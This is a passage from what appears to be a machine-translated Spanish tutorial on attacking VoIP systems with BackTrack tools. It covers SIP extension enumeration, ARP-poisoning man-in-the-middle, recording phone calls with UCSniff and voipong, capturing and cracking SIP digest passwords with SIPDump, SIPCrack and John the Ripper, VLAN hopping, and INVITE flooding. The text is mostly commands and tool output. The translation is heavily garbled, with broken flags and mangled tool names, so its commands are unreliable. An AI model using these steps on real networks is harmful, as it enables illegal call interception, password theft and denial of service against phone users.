svwar.py-d dictionary.txt 10.0.0.2

Ejemplo:

root @ bt :/ pentest / voip / sipvicious #. / 192.168.1.104 svwar.py-e100-400


| Extensin | Autenticacin |
-----------------------------| 201 | reqauth |
| 200 | reqauth |
| 203 | reqauth |
| 202 | reqauth |
| 303 | reqauth |
| 305 | reqauth |

Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro
mtodo sorbo utilizando el m-argumento, tambin se puede aadir-v o t-vv para mostrar ms
informacin.
. root @ bt :/ pentest / voip / sipvicious # / svwar.py-e100-400 192.168.1.104 m-INVITE-v INFO:
TakeASip: tratar de obtener ip auto .. puede tardar un rato INFO: root: iniciar el INFO motores:
TakeASip: Ok dispositivo SIP INFO encontrados: TakeASip: extension '200 'existe - requiere
autenticacin INFO: TakeASip: extension '201' existe - requiere autenticacin ----- Edit- --- INFO:
TakeASip: extension '203 'existe - requiere autenticacin INFO: TakeASip: extension '303' existe requiere autenticacin INFO: TakeASip: extension '303 'existe - requiere autenticacin INFO:

TakeASip: extension '305' existe - requiere INFO autenticacin: root: contamos con 6 extensiones |
Extensin | Autenticacin | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | |
202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO: root: Tiempo total: 0:00:21.944731

Enumiax
Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un
ataque de diccionario o un nombre de usuario secuencial Adivinar
root @ bt :/ pentest / voip / enumiax #. / enumiax
enumIAX 1,0
Dustin D. Trammell
Uso: enumiax [opciones] destino
opciones:
-D Diccionario ataque con expediente
-I Intervalo para auto-save (nmero de operaciones, por defecto 1000)
-M # nombre de usuario mnima (en caracteres)
-M # nombre de usuario mximo (en caracteres)
-R # lmite de velocidad de las llamadas (en microsegundos)
-S Leer el estado de sesin de archivo de estado
-V verbosidad Incremento (repeticin de verbosidad adicional)
-V Imprimir informacin de versin y salir
-H help Imprimir / uso de la informacin y de salida
root @ bt :/ pentest / voip / enumiax #. / enumiax-v-M3-M3 192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:04:18
Ahora trabaja en 3 nombres de usuario de caracteres ...
#################
Tratando nombre de usuario: "000"
#################
Tratando nombre de usuario: "001"
#################
Tratando nombre de usuario: "002"
#################
Tratando nombre de usuario: "003"
#################
Tratando nombre de usuario: "004"
#################
Tratando nombre de usuario: "005"
#################
Tratando nombre de usuario: "006"
#################
Tratando nombre de usuario: "007"
#################
Tratando nombre de usuario: "008"
#################
...

################
################
################
################
################
################
################
################
################
################

root @ bt :/ pentest / voip / enumiax #. / enumiax dict-d-v 192.168.1.104


enumIAX 1,0

Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:02:39
#####################
Tratando de usuario: "guest"
#####################
Tratando nombre de usuario: "iaxtel"
#####################
Tratando nombre de usuario: "iaxtel2"
#####################
Tratando de usuario: "100"
#####################
Tratando nombre de usuario: "101"
#####################
Tratando nombre de usuario: "200"
#####################
Tratando nombre de usuario: "201"
#####################
Tratando de usuario: "202"
#####################
Tratando nombre de usuario: "203"
Fin del archivo de diccionario alcanzado, salir.

############
############
############
############
############
############
############
############
############

Monitoreo de trfico y llamadas telefnicas espionaje


Supervisar el trfico de VoIP puede permitir a un atacante capturar las solicitudes de SIP y RTP datos
enviados desde los clientes al servidor y viceversa. Se puede servir a dos tipos de ataque:
La captura de autenticacin SIP (que ms tarde se discuta este tema en la seccin de
autenticacin atacando).
Usuarios escuchas ilegales llamadas telefnicas.
A efectos de clculo se utilizar el siguiente escenario:

Para este tipo de ataque que tendr que realizar un hombre en medio del ataque que se requieren los
siguientes pasos:
Arp intoxicacin / spoofing
Oler el trfico
Decodificacin RTP datos a un archivo de audio.

Envenenamiento ARP mediante arpspoof


Antes de que podamos comenzar a rastrear el trfico tendremos que nuestro veneno arp switch / puerta de
enlace, vamos a utilizar una herramienta llamada "arpspoof" que se encuentra en "/ usr / sbin /

arpspoof" carpeta en Backtrack, de hecho slo puede invocarlo desde cualquier lugar, escribiendo:
arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvo IP:
root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward

Sintaxis arpspoof debera tener el siguiente aspecto:


root @ bt: ~ # arpspoof
Versin: 2,4
Uso: arpspoof [-i interface] [-t target] anfitrin

Durante un ataque MITM xito tendremos que suplantar en ambos sentidos:


arpspoof-t vctima de puerta de enlace
arpspoof-t gateway vctima

Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura
con Wireshark.

La captura de trfico y espionaje usando Wireshark


Ahora vamos a encender Wireshark para capturar algo de trfico. Vamos a utilizar el siguiente filtro
Wireshark captura:
no transmitir y no multicast y el anfitrin 192.168.1.118

Ahora vamos a empezar a capturar algo de trfico ... Si bien para olfatear el trfico de usuario "B" ha
puesto en marcha el telfono X-Lite suave en su computadora de escritorio y marc el usuario "A"
extensin 200.

Wireshark ha capturado algo de trfico, despus de un tiempo me he detenido el proceso de captura y se


guarda las sesiones en un archivo llamado "sip.pcap".

Podemos ver que hemos capturado el trfico SIP, pero para esta seccin estn ms interesados en el
trfico RTP, ya que contiene los datos reales de conversacin.

Wireshark tiene una caracterstica muy bien para decodificar llamadas VoIP capturados los datos en
formato de audio reproducibles Usted puede encontrar esta caracterstica en las estadsticas -> Llamadas
VoIP men.

Voipong
Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubera, y para aquellos que
estn G711 codificado, los vertederos de conversacin real a archivos de onda diferentes. Es compatible
con SIP, H323, protocolo de cliente de Cisco Delgado, RTP y RTCP. Voipong se encuentra en retroceso "/
pentest / voip / voipong" directorio Antes de poder utilizar voipong tendremos que hacer algunos cambios
en el archivo voipong.conf:
root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf
soxpath = / usr / bin / sox
networksfile = / pentest / voip / voipong / etc / voipongnets
outdir = / pentest / voip / voipong / salida /
device = eth0 # su tarjeta de interfaz de red nombre

Ahora podemos empezar a capturar voipong algunas conversaciones VoIP


root @ bt :/ pentest / voip / voipong #. / voipong-c / etc voipong.conf-d4-f

Una vez voipong detecta una llamada de telfono se iniciar capturarlo una vez que termine de voipong
se detendr el proceso de captura y lo hacen a un fichero wave jugable. Toda la conversacin se guardar
en el directorio "/ pentest / voip / voipong / salida" carpeta

Reproduccin del archivo:

Vomitar
Vomit convierte un telfono Cisco IP RTP conversacin en un archivo de sonido que se puede jugar con
los jugadores sanos normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener
vomitar en marcha tendremos que descargar e instalar WavePlay Consguelo aqu:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html
root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz
WavePlay-20010924 /

waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root @ bt: ~ # cd WavePlay-20010924
root @ bt: ~ / WavePlay-20010924 # make
cc-c-o waveplay.o waveplay.c
waveplay.o cc-o WavePlay
root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin /
root @ bt :/ pentest / voip / vmito # / vmitos sip.dump r |. WavePlay-S8000-B16-C1

UCsniff
UCSniff es un video de VoIP e IP Seguridad herramienta de evaluacin que integra el software de cdigo
abierto que existe en varias caractersticas tiles, lo que permite VoIP y Video IP propietarios y
profesionales de seguridad a prueba rpidamente por la amenaza de espionaje no autorizado VoIP y
Video. UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubrimiento a travs de CDP,
tiene una capacidad de rastreadores y ms ... Lo considero como un todo en una herramienta de
espionaje. Echemos un vistazo a algunos ejemplos de uso:
UCSniff puede operar en los modos 2
Modo Monitor - En caso de ser utilizado en un medio compartido donde los telfonos IP
conectados a saber: un HUB, punto de acceso inalmbrico, se puede tambin utilizar en un
entorno conmutado mediante el establecimiento de una sesin SPAN en un switch Cisco.
Hombre en el modo medio - Este modo tiene 2 modos adicionales que son
Modo de aprendizaje
Modo Dirigido
Preparacin UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrs:
root @ bt :/ tmp # cd / pentest / voip / ucsniff /
root @ bt :/ pentest / voip / ucsniff #. / configure
root @ bt :/ pentest / voip / ucsniff # make
root @ bt :/ pentest / voip / ucsniff # make install

Modo de uso del monitor


root @ bt :/ tmp / ucsniff # ucsniff-i eth0-M
UCSniff 2,1 de partida
Funcionamiento en modo monitor
El archivo de directorio users.txt no puede ser abierto para lectura en el directorio de trabajo
Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo
Escuchando en eth0 ... (Ethernet)
eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2

A partir Unificado oler ...


Advertencia: Asegrese de que usted golpea 'q' cuando haya terminado con este programa.
Advertencia: 'q' re-ARP a las vctimas. Si no lo hace antes de la salida del programa dar lugar a
una denegacin de servicio.
SIP llamada en curso. (Extensin 200, ip 192.168.1.104) llamando al (extensin 201, ip
192.168.1.118)
SIP llamada en curso. (Extensin 200, ip 192.168.1.105) llamando al (extensin 201, ip
192.168.1.104)
SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:7-3-dos. Wav '
SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:8-2-dos. Wav '
Cierre de interfaz de texto ...
Unificado olfateando se detuvo.

Podemos parar las sesiones pulsando la tecla Q.


Varios archivos han sido creados por UCSniff: Los archivos de registro - Contiene informacin detallada
sobre los archivos PCAP transacciones sip - archivo de captura que se puede ver en Wireshark audio wav
- archivos de las conversaciones de audio
root @ bt :/ tmp / ucsniff # ls-l
total de 376
-Rw-r - r -. 1 root root 40854 05 de febrero 05:02 200 Calling-201-5 :2:7-3-ambos wav
-Rw-r - r -. 1 root root 115818 05 de febrero 05:02 200 Calling-201-5 :2:7-3 pcap
-Rw-r - r -. 1 root root 46294 05 de febrero 05:02 200 Calling-201-5 :2:8-2-wav tanto
-Rw-r - r -. 1 root root 103940 05 de febrero 05:02 200 Calling-201-5 :2:8-2 pcap
-Rw-r - r - 1 root root 278 05 de febrero 05:02 call_detail_log
-Rw-r - r - 1 root root 317 05 de febrero 05:02 call_log
-Rw-r - r - 1 root root 10063 05 de febrero 05:02 sip.log
-Rw-r - r - 1 root root 39073 05 de febrero 05:02 sipdump.pcap
-Rw-r - r - 1 root root 0 05 de febrero 05:01 skinny_log

MITM Learning Modo de uso:


Este modo utiliza un protocolo de sealizacin (SIP, Skinny) para asignar extensiones a un direcciones IP.
Puede personalizar los objetivos para interceptar slo direcciones IP especficas o redes. En el siguiente
ejemplo se supone que estamos en el UCSniff VoIP VLAN Arp envenenar a todos los hosts de la subred.
root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / / UCSniff 2,1 escuchar a partir del eth0 ... (Ethernet)
eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2 Asignaron al azar a 255 hosts para la
digitalizacin de ... El escaneo de la mscara de red total para 255 hosts ... * |
================================================ ==> | 100,00%
vctimas de envenenamiento ARP: Grupo 1: Cualquier grupo (todos los hosts de la lista) 2: ANY
(todos los hosts de la lista) entrada asignada nuevo objetivo: (IP: 192.168.1.118) -> Extensin 201 y
nombre: entrada asignada nuevo objetivo: (IP: 192.168.1.104) -> Extensin 200 y nombre: Llamada
SIP en curso. (Extensin 201, ip 192.168.1.118) llamando al (extensin 200, ip 192.168.1.104) SIP
Llamada finalizada. Conversacin grabada en el archivo '201-Calling-200-5 :13:4-2-dos. Interfaz wav
'Clausura de texto ... ARP envenenador desactivado. RE-ARPing las vctimas ... Unificado
olfateando se detuvo.

Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos
utilizados en el ataque.
root @ bt :/ tmp / ucsniff # cat targets.txt
192.168.1.118,201, sip
192.168.1.104,200, sip

MITM modo de objetivo


Target Mode permite espionaje en una capa superior que slo corrientes aleatorias de audio o la direccin
IP de los telfonos para los que no conocen la extensin. Este modo tiene dos modos secundarios: El
usuario Targeted Targeted Conversacin Podemos agregar destinos manualmente a la "targets.txt" archivo
en el siguiente formato: xxxx, extensin, sip 192.168.1.118,201, SIP o utilizar el modo de aprendizaje
para el descubrimiento automtico hosts
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T
UCSniff 2,1 de partida
Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo
No hay objetivos han sido previamente descubierto en el archivo Targets, targets.txt
Por favor, ejecute UCSniff en el modo de aprendizaje, o manualmente editar targets.txt

Una vez que un archivo vlido targets.txt se encuentra, se le pedir que seleccione un modo de escucha:
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T
UCSniff 2,1 de partida
Analizados 2 entradas en el archivo Targets, targets.txt
UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos
Por favor, seleccione un modo de espionaje dirigida:
1. Usuario
Descripcin: interceptar todas las llamadas desde o hacia un punto final determinado.
2. Conversacin
Descripcin: espiar a los flujos de conversacin bidireccional entre dos puntos finales seleccionados.
Por favor, seleccione la opcin (1) o (2):

Si selecciona "Usuario" indica a la herramienta para interceptar todo el trfico entre el Blanco, y el resto
de la red.

En "Conversacin", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar slo el
trfico entre los dos usuarios.

UCSniff incluye las herramientas ms tiles y los ataques de los modos como el salto de VLAN (usando
ACE) que se discutirn ms adelante.

Xplico
Aunque Xplico no est en el directorio Backtrack voip herramientas, es una herramienta muy til para
capturar trfico SIP y RTP (entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital
Forensics - men Herramientas> Anlisis Forense

En caso de que no est presente en la instalacin Backtrack slo tiene que instalar con el comando
siguiente:
root @ bt: ~ # apt-get install xplico

Xplico se puede utilizar para capturar trfico en tiempo real o importar un archivo PCAP Wireshark
captura. De cualquier manera Xplico decodificar los paquetes capturados y les montamos en el formato
adecuado en nuestro caso ser SIP y RTP. Despus de ejecutar Xplico le pedir que inicie sesin, el
nombre de usuario y contrasea por defecto son: xplico

Una vez que haya iniciado sesin para Xplico tendremos que crear un caso

Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a
utilizar Xplico para realizar una captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo
plano usando arpspoof). Ahora tendremos que elegir nuestro caso y crear una nueva sesin

Al elegir nuestra sesin recin creada veremos nuestra pgina de estadsticas principal con la opcin de
elegir nuestro adaptador de red e iniciar / detener el proceso de captura.

Aqu hay un ejemplo para el trfico capturado SIP:

Un ejemplo para el trfico RTP decodificado:

La captura de autenticacin SIP utilizando SIPDump


SIPDump es parte de la suite de herramientas SIPCrack, permite realizar una captura en vivo de
autenticacin SIP respuesta digest o puede volcar una sesin previamente capturados desde un archivo

PCAP. SIPDump uso:


root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------Uso: sipdump [OPCIONES]
= Archivo donde logins capturados se escribir en
Opciones:
-I = Interfaz para escuchar en
-P = Pcap utilizar el archivo de datos
-M = introducir manualmente los datos de acceso
-F " "= Conjunto libpcap filtro
* Es necesario especificar el archivo de volcado

Vivo para capturar con SIPDump:


root @ bt :/ pentest / voip / sipcrack #. / sipdump-i eth0 auth.txt
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* El uso de 'eth0' dev para oler
* Empieza a oler con 'tcp o udp o vlan' filtro de paquetes
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')

Dumping datos de autenticacin de un archivo PCAP


root @ bt :/ pentest / voip / sipcrack #. / sipdump-p / root / registration.pcap auth.txt
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* El uso de pcap file '/ root / registration.pcap' para oler
* Empieza a oler con 'tcp o udp o vlan' filtro de paquetes
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.101 (Usuario: '200 ')
* Al salir, olfate un inicio de sesin

SIPDump a escribir la respuesta al desafo de autenticacin en el archivo especificado que se ve de la


siguiente manera:
Vamos a disscuss agrietamiento estos desafos en el captulo autenticacin contrario.

Atacar autenticacin
SIP puede ser susceptible a dos tipos de ataques de autenticacin, antes de echar un vistazo a estos
ataques tipo vamos a entender cmo es un registro SIP y el proceso de autenticacin se lleva a cabo. SIP
utiliza una autenticacin implcita que es un mecanismo que utiliza el protocolo HTTP y conocido como
HTTP digest. Debido a que SIP es un protocolo basado en ASCII los detalles de autenticacin son
ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere
autenticar con un servidor SIP, el servidor genera y enva un desafo digest al cliente, que contiene los
siguientes parmetros:

Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio
SIP Nonce -. Esto es una cadena md5 nico que es generado por el servidor para cada solicitud de
registro que est hecho de un sello de tiempo y una frase secreta para asegurar tiene una vida til limitada
y no se poda ser utilizado de nuevo. Una vez que el cliente recibe el desafo digest y el usuario introduce
sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo enva de vuelta al
servidor.

Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contrasea vlida de
SIP cuenta.

Cracking SIP Digest hashes respuesta


Backtrack ofrece una gran herramienta llamada SIPCrack, Ya hemos discutido cmo capturar una
autenticacin vlida SIP compendio de respuestas utilizando SIPDump. SIPCrack se puede encontrar en
root @ bt :/ pentest / voip / sipcrack #

SIPCrack uso:
root @ bt :/ pentest / voip / sipcrack #. / sipcrack
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------Uso: sipcrack [opciones] [-s |-w ]
Logins = Archivo que contiene olfate por Opciones SIPdump:-s = stdin uso de contraseas
lista de palabras-w = archivo que contiene todas las contraseas a probar-p num = proceso de
impresin de craqueo contraseas cada n (-w) (ATENCIN: se ralentiza en gran medida) * O -w o-s
tiene que ser dada

SIPCrack puede funcionar en dos modos:


Ataque de diccionario
STDIN

Ataque de diccionario
Backtrack ofrece algunos diccionarios bsicos que se encuentran en:
root @ bt :/ pentest / passwords / listas de palabras

Sin embargo, para el propsito de este artculo voy a utilizar otra herramienta en la parrilla Crunch
retroceder llamada que se utiliza para crear diccionarios personalizados. Vamos a utilizar para crear un
crujido crujido seis caracteres numricos diccionario se encuentra en:

root @ bt :/ pentest / passwords / crunch #

Crunch de uso:
uso: crunch [-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s
Startblock] [-c nmero]

Para el uso crujido detallado comprobar su manual:


root @ bt :/ pentest / passwords / crunch crunch hombre #

Creacin de un diccionario de seis caracteres numricos:

root @ bt :/ pentest / passwords / crunch #. / crunch 6 6-f charset.lst numrico-o / pentest / voip /
sipcrack / sipass.txt Crunch generar ahora 7000000 bytes de datos Crunch ahora generar 6 MB de
datos Crunch ahora genera 0 GB de datos 100%

Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo
auth.txt ans sipass.txt como diccionario (que hemos creado utilizando crunch)
Descifrando la respuesta Digest:

root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w auth.txt sipass.txt


SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Se encuentra Cuentas:
Num Cliente Servidor Hash usuario | contrasea
1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd
* Seleccione la entrada de roer (1 - 1): 1
* Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd')
* Lista de palabras Cargado: 'sipass.txt'
* A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd')
* Se ha intentado 123457 contraseas en 0 segundos
* Contrasea Encontrados: '123456 '
* Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataque de fuerza bruta con John The Ripper


Para este modo de ataque que usaremos John the ripper para redirigir la salida johns en el archivo FIFO
que vamos a alimentar a SIPCrack. Creacin de un archivo FIFO:
root @ bt :/ tmp # mkfifo sipcrack

Generando contraseas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos
a generar hasta 6 dgitos solamente.
root @ bt: ~ # john
[*] Este script le llevar a / pentest / passwords / jtr /
[*] A partir de ah, ejecute. / John
root @ bt :/ pentest / passwords / JTR # / john -. incremental = dgitos-stdout = 6> / tmp / sipcrack

Utilizando el archivo FIFO para romper la clave:


root @ bt :/ pentest / voip / sipcrack #. / sipcrack-w / tmp / sipcrack auth.txt
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Se encuentra Cuentas:
Num Cliente Servidor Hash usuario | contrasea
1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968
* Seleccione la entrada de roer (1 - 1): 1
* Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968')
* Lista de palabras Cargado: '/ tmp / sipcrack'
* A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968')
* Se ha intentado tres contraseas en 0 segundos
* Contrasea Encontrados: '123456 '
* Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataques de fuerza bruta SIP Cuentas


Podemos utilizar svcrack que forma parte de la suite de herramientas sipvicious a la fuerza bruta sorbo
representa una nica cuenta SIP ataque de diccionario (Usted puede agregar un v-o-vv para mostrar ms
informacin):
root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-d 192.168.1.104 wordlist.txt
| Extensin | Contrasea |
-----------------------| 200 | 123456 |

Una sola cuenta SIP bruta obligando a:


root @ bt :/ pentest / voip / sipvicious #. / svcrack.py-u200-r100000-999999 192.168.1.104
| Extensin | Contrasea |
-----------------------| 200 | 123456 |

Usar. / Svcrack-h para todos los argumentos disponibles.

VLAN Hopping
Por lo general, el trfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la
seccin topologas. Esto significa que no se puede interceptar el trfico de VoIP por inhalacin e

intoxicacin Arp. La razn de ello es que una VLAN es como una red independiente, tiene su propio
dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto es una forma de "saltar" a
otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo
este ataque. Una topologa comn es cuando el telfono IP tiene un built-in "Switch interno", por lo
general el PC est conectado a la toma PC y el telfono mvil se conecta desde su lan / sw socket con el
conmutador de red de la siguiente manera:

Un conmutador CISCO tpica configuracin de puertos para VoIP se ver algo como:
Switch # conf t
Introduzca los comandos de configuracin, uno por lnea. Terminar con CTRL / Z.
Switch (config) # interface FastEthernet 0/1
Switch (config-if) # switchport modo de acceso
Switch (config-if) # switchport access vlan 10
Switch (config-if) # switchport voz vlan 20

El telfono IP se configurar con la ID de VLAN correspondiente (20) y el trfico de datos PC fluir a


travs de la VLAN 10. Antes de comenzar saltando alrededor, tendremos que activar el soporte para el
protocolo 802.1q en Backtrack escribiendo:
root @ bt: ~ # modprobe 8021q

VoIP Hopper
VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un telfono IP, soporta
conmutadores especficos y es compatible con algunos modelos de telfonos IP. Actualmente soporta las
marcas como: Cisco, Avaya y Nortel. VoIP tolva fue diseado para ejecutarse en Backtrack Linux y
actualmente cuenta con las siguientes caractersticas: DHCP Client, generador de CDP, la suplantacin de
direcciones MAC y VLAN salto. Voiphopper uso:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper
voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID>
Por favor, especifique una opcin de modo de base:
CDP Sniff Mode (-c 0)
Ejemplo: voiphopper-i eth0-c 0
CDP Spoof modo de paquete personalizado (-c 1):
-D (ID de dispositivo)
-P (Port ID)
-C (Capacidades)
-L (Plataforma)
-S (Software)
-U (Duplex)
Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S
'P003-08-8-00-1-U
CDP Spoof modo de pre-hechos paquetes (-c 2)
Ejemplo: voiphopper-i eth0-c 2
Avaya modo DHCP Opcin (-a):

Ejemplo: voiphopper-i eth0-a


Modo VLAN Hop (-v ID de VLAN):
Ejemplo: voiphopper-i eth0-v 200
Nortel modo DHCP Opcin (-n):
Ejemplo: voiphopper-i eth0-n

VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener informacin
detallada.
Echemos un vistazo a un ejemplo de la inhalacin de CDP y ejecutar un salto de VLAN en la VLAN de
voz en un entorno de Cisco. Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-c 0

VoIP Hopper tambin le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce
la voz VLAN ID o le gustara Hop VLAN a otra VLAN slo tiene que especificar el ID de VLAN.
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-v 20
VoIP Hopper 1,00 Ejecucin en modo VLAN Hop ~ Tratar de saltar a la VLAN 2
Aadido VLAN 20 a la interfaz eth0
Intentando dhcp solicitud de nueva interfaz eth0.20
eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2
inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace
UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Mtrica: 1
RX packets: 0 errores: 0 cado: 0 sobrecostos: 0 frame: 0
TX paquetes: 9 errores: 0 cado: 0 sobrecostos: 0 carrier: 0
colisiones: 0 txqueuelen: 0
RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)

ACE
ACE es una herramienta ms para VLAN salto muy similar a Voiphopper en el uso e incluyen una opcin
para descubrir tambin los servidores de TFTP (servidores de configuracin). ACE uso:
root @ bt :/ pentest / voip / as #. / as
ACE v1.0: Automated corporativa (Datos) Enumerator
Uso: as [-i interface] [-m mac address] [-t servidor tftp direccin ip |-c modo cdp |-v voz vlan id |-r
interfaz vlan |-d modo verbose]
-I <interface> (Obligatorio) Interfaz para olfatear / envo de paquetes
-M MAC> (Obligatorio) Direccin MAC del telfono IP vctima
-T <tftp servidor ip> (Opcional) Servidor tftp direccin IP
-C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP
-V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz
-R <vlan usuario> (opcional) Elimina la interfaz VLAN
-D (Opcional) verbose | modo de depuracin

Puede agregar manualmente un salto de VLAN o utilizar su funcin de descubrimiento


Modo para especificar el ID de VLAN de voz
Ejemplo: As-i eth0-v 96 m 00:1 E: F7: 28:9 C: 8E
Modo para auto-descubrir ID VLAN de voz en el modo de audicin para CDP
Ejemplo: As-i eth0-c 0-m 00:1 E: F7: 28:9 C: 8E
Modo para auto-descubrir ID VLAN de voz en el modo de suplantacin para CDP
Ejemplo: As-i eth0-c 1-m 00:1 E: F7: 28:9 C: 8E

TIP: Para ver la direccin MAC en uso marcha atrs:


root @ bt: ~ # macchanger-s eth0

No importa si se ha utilizado o voiphopper as ahora se puede interceptar el trfico de VoIP con


herramientas como "ucsniff" especificando que acaba de crear la interfaz.
Por ejemplo:
root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /

Denial Of Service
Un ataque de denegacin de servicio en los servicios de VoIP puede hacerlo intil, causando un dao
intencional a la red y la disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles,
ataques de red estndar DoS y ataques especficos de VoIP DOS. Generalmente se enviar toneladas de
datos por la inundacin de la red para consumir todos sus recursos o un protocolo especfico con el fin de
saturar con toneladas de peticiones. Vamos a echar un vistazo rpido de las herramientas disponibles en
Backtrack

Inviteflood
Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada
para combatir gateways SIP / apoderados y telfonos SIP.
root @ bt :/ pentest / voip / inviteflood #. / inviteflood
inviteflood - Versin 2.0
09 de junio 2006
Uso:
Obligatorio interfaz (por ejemplo eth0)
usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212")
dominio de destino (por ejemplo enterprise.com o una direccin IPv4)
IPv4 addr objetivo de inundacin (ddd.ddd.ddd.ddd)
inundacin etapa (es decir, nmero de paquetes)
Opcional -Una inundacin herramienta "De:" alias (por ejemplo jane.doe)

I-IPv4 direccin IP de origen [por defecto es la direccin IP de la interfaz]


-S srcport (0 - 65535) [por defecto es bien conocido puerto de descarte 9]
-D DestPort (0 - 65535) [por defecto es bien conocido puerto SIP 5060]
-L En lineString utilizado por SNOM [por defecto est en blanco]
-S tiempo de sueo msgs btwn invitar (us)
-H help - imprime este uso
-V modo detallado salida

Una sintaxis de uso bsico es el siguiente:


. / Inviteflood eth0 target_extension target_domain target_ip number_of_packets

Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas
telefnicas. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not
found just to keep it busy.

Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a
